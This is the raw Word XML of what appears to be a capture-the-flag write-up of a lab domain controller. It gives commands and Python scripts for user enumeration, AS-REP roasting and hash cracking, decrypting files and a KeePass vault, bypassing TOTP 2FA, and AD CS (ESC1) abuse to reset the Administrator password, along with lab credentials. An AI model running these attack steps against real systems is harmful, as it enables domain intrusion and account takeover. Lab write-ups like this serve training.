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atcuj2chpaqp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p8jbceytwvmm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Singularity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If support is required, please open a ticket in the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support channel on the Discord server.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2"/>
        <w:spacing w:after="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swpeyfsbuz1y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tool, enumeration of open ports and exposed services on the target machine was performed.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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Multiple open ports were identified, including services typical of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Windows Domain Controller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53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(DNS),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88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(Kerberos),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135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(MSRPC),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139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(NetBIOS-SSN),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389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(LDAP),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445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(Microsoft-DS),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593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(RPC over HTTP),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636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(LDAPS), and 3389 (RDP). The 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singularity.hc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the hostname </w:t>
      </w:r>
      <w:hyperlink r:id="rId11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DC01.singularity.hc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identified.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machine’s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address was added to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to allow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DNS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resolution of the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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DC01.singularity.hc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singularity.hc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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Domain user enumeration was performed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RID Brute Force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with  </w:t>
      </w:r>
      <w:hyperlink r:id="rId13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NetExec.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&lt;macine-ip&gt;-u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--rid-brute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'SidTypeUser'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'\\'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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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following users were identified: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Guest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krbtgt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DC01$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svc-webapp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dev-marcus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build-agent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m.jhony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svc-teamcity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AS-REP Roasting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attack was performed.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> AS-REP Roasting exploits Active Directory accounts with Kerberos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pre-authentication disabled.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such cases, it is possible to obtain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AS-REP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encrypted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user’s password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perform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offline cracking.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If the password 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weak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 account can be compromised without generating login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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GetNPUsers.py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singularity.hc/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-dc-ip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DC01.singularity.hc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-usersfile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file-path/users.txt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-no-pass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27100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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hash of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svc-webapp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obtained. The hash type was identified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–identify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/home/gabrie0x6c/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt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04900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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password was successfully cracked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resulting in the credential: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svc-webapp / PolniyPizdec0211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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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obtained credentials,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 enumeration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performed. Using the compromised user, it was possible to authenticate to the service and enumerate available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directories and files.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svc-webapp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PolniyPizdec0211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enumeration, a system folder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DevOps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identified, which is not part of the default system folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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//singularity.hc/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svc-webapp%PolniyPizdec0211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51000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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All contents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DevOps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folder were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downloaded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 analysis.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//singularity.hc/DevOps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svc-webapp%PolniyPizdec0211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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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01900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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90600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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downloading the files, the folder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Singularity Projects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identified, containing the files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CryptoVault.dll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CryptoVault.exe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data.enc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CryptoVault.dll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library was analyzed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strings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tool.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CryptoVault.dll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16400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Hardcoded credentials were discovered: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master key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salt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S1ngul4r1ty_M@st3rK3y_2025!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SingularitySalt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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61vbcxkhrxc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ez6vjycv8vkq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 script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developed to decrypt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data.enc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AES in CBC mode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based on the previously identified master key and salt.</w:t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Crypto.Cipher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"S1ngul4r1ty_M@st3rK3y_2025!"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STATIC_SALT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b"SingularitySalt"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derive_key(password):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md5_hash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hashlib.md5(password.encode()).digest()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md5_hash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md5_hash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generate_iv():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hashlib.md5(STATIC_SALT).digest()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open('Singularity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Projects/data.enc',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'rb')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data[0:4]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data[4:6]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data[6:14]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enc_length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int.from_bytes(data[14:18],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'little')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encrypted_data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data[18:18+enc_length]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print(f"Magic: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{magic}")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{version.hex()}")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print(f"Encrypted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{enc_length}")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derive_key(MASTER_KEY)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generate_iv()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print(f"\nKey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(MD5):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{key.hex()}")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(MD5):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{iv.hex()}")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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(encrypted_data)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padding_len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decrypted[-1]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decrypted[:-padding_len]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open('decrypted_correct.txt',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'wb')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out.write(decrypted)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print(f"\n===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print(decrypted.decode('utf-8',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errors='ignore'))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data.enc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was successfully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decrypted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decrypted file corresponds to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7-Zip (7z)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archive.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decrypted_correct.txt</w:t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86000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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extracting the 7-Zip archive, the files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Database.kdbx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keyfile.key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found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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script was used to extract data from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Database.kdbx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test_keyfile_only.py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pykeepass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PyKeePass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kdbx_file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'Database.kdbx'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'keyfile.key'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password)...")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PyKeePass(kdbx_file,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password=None,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keyfile=keyfile)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print("\n🎉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kp.entries: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print(f"\n📌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{entry.title}")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{entry.username}")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{entry.password}")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entry.url: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{entry.url}")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entry.notes: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{entry.notes}")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print("-"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{str(e)[:200]}")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print("\n[*]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PyKeePass(kdbx_file,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password='',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keyfile=keyfile)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print("\n🎉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kp.entries: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print(f"{entry.title}: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{entry.username}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{entry.password}")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{str(e)[:200]}")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test_keyfile_only.py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05200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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decrypting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Database.kdbx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TeamCity credentials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identified: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dev-marcus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password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vSjasnel12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associated with the service a</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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http://singularity:8111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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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TeamCity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access,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TOTP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decrypted, allowing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2FA bypass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singularity_decrypt_totp.py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'SCRIPT'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#!/usr/bin/env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hmac,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hashlib,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Crypto.Cipher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argon2.low_level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hash_secret_raw,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evp_bytes_to_key(password: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key_len=32,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iv_len=16):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"""OpenSSL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MD5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derivation."""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b'',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len(d)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iv_len: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hashlib.md5(prev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salt).digest()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d[:key_len],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d[key_len:key_len+iv_len]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openssl_decrypt(b64data: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"""Decrypt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(AES-256-CBC,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EVP_BytesToKey)."""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base64.b64decode(b64data)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raw[:8]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b"Salted__",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raw[8:16],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raw[16:]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evp_bytes_to_key(password.encode(),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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(ciphertext)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pt[-1]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ValueError("Bad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padding")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pt[:-pad]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argon2_derive(argon2_hash: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out_len=48):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"""Derive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parameters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argon2_hash.split('$')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{kv.split('=')[0]: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int(kv.split('=')[1])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parts[3].split(',')}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base64.b64decode(parts[4])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hash_secret_raw(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secret=password.encode(),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salt=salt,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time_cost=params['t'],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memory_cost=params['m'],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parallelism=params['p'],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hash_len=out_len,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type=Type.ID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argon2_decrypt(b64data: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argon2_hash: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base64.b64decode(b64data)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raw[:8]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b"Salted__",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raw[8:16],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raw[16:]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argon2_derive(argon2_hash,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derived[:32],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derived[32:48]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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(ciphertext)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pt[-1]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ValueError("Bad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padding")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pt[:-pad]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show_totp(secret_bytes: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secret_bytes.decode().strip()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all(c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"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567="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s.upper())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base64.b32encode(secret_bytes).decode()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base64.b32encode(secret_bytes).decode()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pyotp.TOTP(secret)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print(f"\nDecrypted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(Base32):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{secret}")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{totp.now()}")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print(f"Prev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(-30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{totp.at(int(time.time())-30)}")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(+30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{totp.at(int(time.time())+30)}")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len(sys.argv)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print("Usage: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singularity_decrypt_totp.py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sys.exit(1)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json.load(open(sys.argv[1]))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sys.argv[2]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secret_b64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data[list(data.keys())[0]]["secret"]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enc_key_b64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data["key"]["enc"]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data["key"]["hash"]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key_plain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openssl_decrypt(enc_key_b64,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key_plain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argon2_decrypt(enc_key_b64,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argon2_hash)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secret_plain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openssl_decrypt(secret_b64,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key_plain.decode(errors='ignore'))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secret_plain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argon2_decrypt(secret_b64,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key_plain.decode(errors='ignore'),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argon2_hash)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show_totp(secret_plain)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singularity_decrypt_totp.py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totp_data.json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'vSjasnel12'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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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TeamCity TOTP code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was successfully obtained, granting access to the application at</w:t>
      </w:r>
      <w:hyperlink r:id="rId32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http://singularity:8111</w:t>
        </w:r>
      </w:hyperlink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dev-marcus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vSjasnel12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398896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57500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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71800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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57400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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access to the service,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TeamCity backup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performed through the administration panel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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http://singularity.hc:8111/admin/admin.html?item=backup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38500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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36900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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backup files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downloaded and analyzed.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project-config.xml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credentials stored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 plaintext were found for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m.jhony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with password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ypOSJXPqlDOxxbQSfEERy30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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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obtained credentials,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remote access to the machine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attempted using </w:t>
      </w:r>
      <w:hyperlink r:id="rId40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Evil-WinRM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evil-winrm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m.jhony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'ypOSJXPqlDOxxbQSfEERy300'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57300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Remote access was successfully obtained, and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found on the Desktop of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m.jhony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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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csdxa6t5d534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1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43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Certipy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used to identify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 CS vulnerabilities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Certipy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is a tool for enumeration and exploitation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Active Directory Certificate Services (AD CS)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8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identifies insecure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templates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permissions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enables certificate abuse for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privilege escalation and domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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certipy-ad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m.jhony@singularity.hc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'ypOSJXPqlDOxxbQSfEERy300'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-dc-ip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-vulnerable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14600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Vulnerabilities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ESC1, ESC4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ESC15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were identified.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ESC4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occurs when a user has excessive permissions over certificate templates, allowing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modification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subsequent abuse to obtain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privileged certificates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ESC15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involves templates configured for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insecure machine/user authentication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enabling the issuance of certificates that can be used for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impersonation and privilege escalation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ESC1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occurs when a certificate template allows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Authentication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 requester can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arbitrarily define the Subject/UPN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allows for the issuance of a certificate on behalf of another user, including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 Admin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20260124220844_Certipy.json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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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ESC1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it is necessary to obtain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user's SID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(e.g.,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Administrator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because it is used in the certificate request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impersonate the correct identity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during authentication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RPC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the correct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issued certificate can be accepted by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Directory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belonging to the privileged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rpcclient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"m.jhony%ypOSJXPqlDOxxbQSfEERy300"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singularity.hc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"lookupnames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S-1-5-21-3139681580-4135018421-750518322-500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8300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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command issues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 certificate for the Administrator user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allowing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to Active Directory without requiring a password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certipy-ad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m.jhony@singularity.hc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'ypOSJXPqlDOxxbQSfEERy300'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-dc-ip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dc01.singularity.hc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'singularity-DC01-CA'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'User'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'administrator@singularity.hc'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'S-1-5-21-3139681580-4135018421-750518322-500'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14500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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issued certificate was used for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LDAP authentication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allowing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Administrator user's password to be changed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was reset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NovaSenha@123\!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certipy-ad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-pfx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administrator.pfx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-dc-ip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-ldap-shell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change_password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NovaSenha@123!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65300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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password reset,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remote access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obtained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Evil-WinRM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evil-winrm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'NovaSenha@123!'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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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located at: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C:\Users\Administrator\Desktop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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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sectPr>
      <w:headerReference r:id="rId51" w:type="default"/>
      <w:headerReference r:id="rId52" w:type="first"/>
      <w:headerReference r:id="rId53" w:type="even"/>
      <w:footerReference r:id="rId54" w:type="default"/>
      <w:footerReference r:id="rId55" w:type="first"/>
      <w:footerReference r:id="rId56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All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">  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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.170oxjxi27vw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96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83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4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94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8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Singularity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84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Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/Certipy" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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image" Target="media/image34.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId49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training/training-machines/298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31.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dc01.singularity.hc" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netexec.wiki/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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3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WhnuTbi+4Xuyhl6YlfEndGyOjQ==">CgMxLjAyDmguYXRjdWoyY2hwYXFwMg5oLnA4amJjZXl0d3ZtbTIOaC5zd3BleWZzYnV6MXkyDmguNjF2YmN4a2hyeGN0Mg5oLmV6NnZqeWN2OHZrcTIOaC5jc2R4YTZ0NWQ1MzQyDmguMTcwb3hqeGkyN3Z3OAByITFpSHlRMDNXa3dNSzRucHgzVmhfbVkzZS1kUHI4X0RGRw==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